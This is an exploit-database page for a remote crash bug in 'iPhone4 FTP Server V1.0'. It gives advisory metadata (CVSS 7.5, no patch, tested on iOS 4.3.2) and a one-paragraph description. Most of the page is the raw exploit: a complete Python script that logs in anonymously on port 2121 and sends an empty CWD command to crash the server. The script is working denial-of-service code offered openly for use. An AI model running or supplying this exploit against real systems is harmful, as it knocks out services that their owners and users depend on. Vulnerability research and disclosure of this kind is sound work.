iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash

vendor:

iPhone4 FTP Server

by:

offsetIntruder

7.5

CVSS

HIGH

Remote Crash

N/A

CWE

Product Name: iPhone4 FTP Server

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:zhang_boyang:iphone4_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone4 IOS 4.3.2

2011

iPhone4 FTP Server V1.0 – Empty CWD-RETR Remote Crash

The vulnerability exists in the iPhone4 FTP Server V1.0 application, which allows an attacker to remotely crash the application by sending an empty CWD command. This can be exploited by sending an empty CWD command to the FTP server running on port 2121.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash
# Date: 2011-05-30
# Author: offsetIntruder
# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8
# Version: 1.0
# Tested on: iPhone4 IOS 4.3.2
# CVE: N/A
 
import socket
import sys
 
user="anonymous"

 
print("\n iPhone4 FTP Server By Zhang Boyang - Empty CWD-RETR Remote Crash\n")


def ExploitFTP(target):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,2121))
	data = s.recv(1024)
	print("[+] Sending user login...")
	s.send("USER " + user + '\r\n')
	data = s.recv(1024)
	print("[+] Sending empty CWD...\n")
	s.send("CWD \r\n")
	data = s.recv(1024)
	s.close()
	
target = sys.argv[1]
 
ExploitFTP(target)